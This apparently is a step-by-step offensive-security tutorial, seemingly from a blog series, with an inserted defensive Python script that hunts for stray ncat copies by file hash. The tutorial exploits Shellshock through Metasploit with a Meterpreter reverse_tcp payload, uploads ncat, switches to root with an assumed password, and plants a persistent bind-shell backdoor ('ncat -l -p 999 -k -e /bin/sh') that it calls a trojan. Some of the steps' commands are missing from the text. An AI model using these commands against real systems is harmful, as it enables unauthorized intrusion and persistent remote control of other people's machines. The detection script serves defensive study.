So far we have used Ncat as a Telnet replacement. Instead of using Ncat to connect to other computers, we can also run Ncat in listen mode. Listen mode lets us install Ncat on a compromised machine, run it on any port we choose, and then connect to it with another copy of Ncat on our attacking computer. We can start Ncat in listen mode and bind a bash shell to it, allowing us to pass commands to the target host. We can also freely disconnect from and reconnect to the listening Ncat on the target system. So, without any further delay, let's take a look at how we can use Ncat as a trojan.
Step 1: Copying Ncat
First, let's copy the Ncat binary to our home folder:
cp /usr/bin/ncat ~
Step 2: Starting Metasploit Framework
Now we will compromise our target the same way we did in earlier posts: by exploiting the Shellshock vulnerability with Metasploit Framework.
Start the Metasploit Framework:
Step 3: Selecting Exploit Module
Select the Shellshock exploit module:
Step 4: Selecting Payload
As you may remember from earlier posts, Meterpreter, one of the most powerful Metasploit payloads, has an easy file upload feature. So let's use Meterpreter to transfer Ncat to our target. Select the Meterpreter payload as follows:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
Step 5: Setting Options: RHOST, TARGETURI, LHOST
Now start configuring the exploit options. Again, RHOST is the target (remote) host:
set RHOST skillsetlocal.com
The TARGETURI value points to the vulnerable script on the target system:
set TARGETURI /cgi-bin/vulnscript.sh
Finally, LHOST is the local IP that Meterpreter will connect back to:
set LHOST 127.0.0.1
Step 6: Running Exploit
Let's run the exploit.
You should get a Meterpreter shell prompt.
Step 7: Uploading Ncat
Now we will transfer Ncat to the target with Meterpreter's upload command:
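From the defender's side, the binary that was just copied out of /usr/bin and uploaded is an on-disk artifact worth hunting for. The script below is an added example and not part of the original post: it hashes the packaged ncat and walks a directory tree for other files with identical contents, or with a netcat-family name, outside the directories where a packaged netcat legitimately lives. The directory tree, the file contents standing in for the binary, and the expected-directory set used in demo() are all constructed for the demonstration.

```python
"""Hunt for stray copies of the ncat binary on a host.

Added example; this is not code from the original post. A defender can hash
the packaged /usr/bin/ncat and walk the filesystem for other files with the
same contents (or a netcat-family name) outside the usual install directories.
The directory layout and files built in demo() are constructed stand-ins.
"""
import hashlib
import os
import tempfile

NETCAT_NAMES = {"ncat", "nc", "netcat"}
# Where a packaged netcat legitimately lives; copies anywhere else are suspect.
DEFAULT_EXPECTED_DIRS = frozenset({"/usr/bin", "/bin", "/usr/local/bin"})


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_stray_copies(root: str, reference_hash: str,
                      expected_dirs=DEFAULT_EXPECTED_DIRS) -> list:
    """Return sorted (path, reason) pairs for suspicious netcat files under root."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        if dirpath in expected_dirs:
            continue  # the packaged copy is allowed here
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue  # skip symlinks and special files
            try:
                same_bytes = sha256_of(path) == reference_hash
            except OSError:
                continue  # unreadable; a real scan would log this
            if same_bytes:
                hits.append((path, "contents match reference ncat"))
            elif name in NETCAT_NAMES:
                hits.append((path, "netcat-family filename"))
    return sorted(hits)


def demo() -> list:
    """Build a throwaway tree (constructed data) and return hits relative to it."""
    with tempfile.TemporaryDirectory() as root:
        def put(rel, data):
            p = os.path.join(root, rel)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "wb") as fh:
                fh.write(data)
            return p
        ncat_bytes = b"\x7fELF constructed stand-in for the ncat binary"
        reference = put("usr/bin/ncat", ncat_bytes)          # the packaged copy
        put("home/alice/ncat", ncat_bytes)                    # cp /usr/bin/ncat ~
        put("tmp/.x", ncat_bytes)                             # renamed copy
        put("opt/tools/nc", b"#!/bin/sh\necho not really\n")  # name match only
        put("home/bob/notes.txt", b"nothing to see")
        hits = find_stray_copies(root, sha256_of(reference),
                                 expected_dirs={os.path.dirname(reference)})
        return [(os.path.relpath(p, root), why) for p, why in hits]


if __name__ == "__main__":
    for path, why in demo():
        print(f"{path}: {why}")
```

On a real host you would pass `/` (or the mount points you care about) as `root` and the hash of the packaged binary as `reference_hash`; the content match is the reliable signal, since a renamed copy still hashes the same, while the filename match only catches copies that kept a recognisable name.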
Step 8: Getting a Shell
Now we need to start Ncat in listen mode. First, open a command shell from Meterpreter:
Step 9: Switching to root
We will need elevated privileges to bind Ncat to port 999 (ports below 1024 are privileged on Linux). Let's assume that we already obtained the root password for the target (using one of the techniques we covered in other posts). Enter the following command to switch to root:
Enter password123 when prompted.
Now we can start Ncat.
Step 10: Starting Ncat Listener
The command below starts Ncat in listen mode. The -k option keeps it listening even after a client disconnects (this is an important option). The -p option selects the port, and -e executes the given program with its input and output wired to the connection, which binds the command shell to the selected port.
ncat -l -p 999 -k -e /bin/sh
We are done here. Our Trojan backdoor is set up, and now we can get access to the target system whenever we want. Hit Ctrl+C and enter y to return to the prompt. Enter exit twice to close the Metasploit Framework.
Step 11: Connecting to Listener
Let's see if we can connect to the listener. Enter the following command:
ncat skillsetlocal.com 999
You have command line access to the target. Try entering an OS command to verify (you won't see any kind of prompt; just enter the command on the new line):
whoami
Neat. You can try disconnecting (press Ctrl+C) and reconnecting (re-enter the Ncat command). The listener stays up.